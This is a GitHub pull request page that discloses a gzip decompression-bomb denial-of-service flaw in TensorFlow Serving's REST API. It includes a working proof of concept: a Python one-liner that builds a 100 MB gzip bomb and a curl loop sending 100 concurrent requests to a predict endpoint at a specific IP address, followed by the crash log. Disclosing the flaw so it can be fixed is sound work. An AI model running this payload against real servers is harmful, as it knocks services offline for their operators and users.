Skip to content

Fix: HTTP Gzip Decompression Bomb DoS#4136

Open
theteatoast wants to merge 1 commit intotensorflow:masterfrom
theteatoast:master
Open

Fix: HTTP Gzip Decompression Bomb DoS#4136
theteatoast wants to merge 1 commit intotensorflow:masterfrom
theteatoast:master

Conversation

@theteatoast
Copy link
Copy Markdown

@theteatoast theteatoast commented Apr 17, 2026

Description:

A remote unauthenticated attacker can crash any Serving instance by sending a small gzip-compressed HTTP request body (< 1 KB) that decompresses into ~100 MB of heap memory. By sending a modest number of concurrent requests (~50-100), the attacker can force the server to allocate multiple gigabytes of heap memory, triggering an OOM kill. The server has no request body size limit, no decompression ratio guard, and no per-connection memory budget.

No authentication is required. This is the default configuration of any TensorFlow Serving deployment with --rest_api_port enabled.

Steps to Reproduce:

  1. Start a TensorFlow Serving instance:
docker run -t --rm \
  -p 8501:8501 \
  -v ~/models/resnet:/models/resnet \
  -e MODEL_NAME=resnet \
  --memory=2g \
  --memory-swap=2g \
  tensorflow/serving

Note: Using resnet model for POC

--memory=2g --memory-swap=2g is set for a quick, reproducible PoC in a controlled environment.
In a real-world deployment without memory constraints, the impact would be significantly worse as the server would sustain the full ~10GB concurrent allocation before OOM kill.

  1. Generate the gzip payload (~100KB compressed → 100MB decompressed):
python3 -c "
import gzip, io, sys
buf = io.BytesIO()
with gzip.GzipFile(fileobj=buf, mode='wb', compresslevel=9) as f:
    f.write(b'\x00' * 100000000)
sys.stdout.buffer.write(buf.getvalue())
" > /tmp/bomb.gz
  1. Send 100 concurrent requests:
for i in $(seq 1 100); do
  curl -s -X POST http://38.242.248.113:8501/v1/models/resnet:predict \
    -H "Content-Type: application/json" \
    -H "Content-Encoding: gzip" \
    --data-binary @/tmp/bomb.gz &
done
wait

Observed result:

Server process is killed mid-operation and exits immediately. All inference capacity is lost:

[evhttp_server.cc : 261] NET_LOG: Entering the event loop ...
/usr/bin/tf_serving_entrypoint.sh: line 3: 6 Killed tensorflow_model_server \
  --port=8500 --rest_api_port=8501 --model_name=${MODEL_NAME} \
  --model_base_path=${MODEL_BASE_PATH}/${MODEL_NAME}

Impact:

  • No authentication required: default deployment is fully exposed
  • ~1000x amplification: ~100KB payload triggers 100MB allocation per request
  • Full service disruption: all served models become unavailable
  • Trivially repeatable: server restarts in the same vulnerable state; attacker can sustain permanent unavailability with minimal bandwidth (~10MB/s)
  • Affects all default deployments: no misconfiguration required

PS:

The report was previously submitted to Google VRP, but it was closed with the note that it primarily impacts service availability. Specifically, "ways to enable denial of service attacks are less of a concern for us." I also wasn't able to find a clear owner or contact, and there doesn't appear to be a security policy in the repository.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant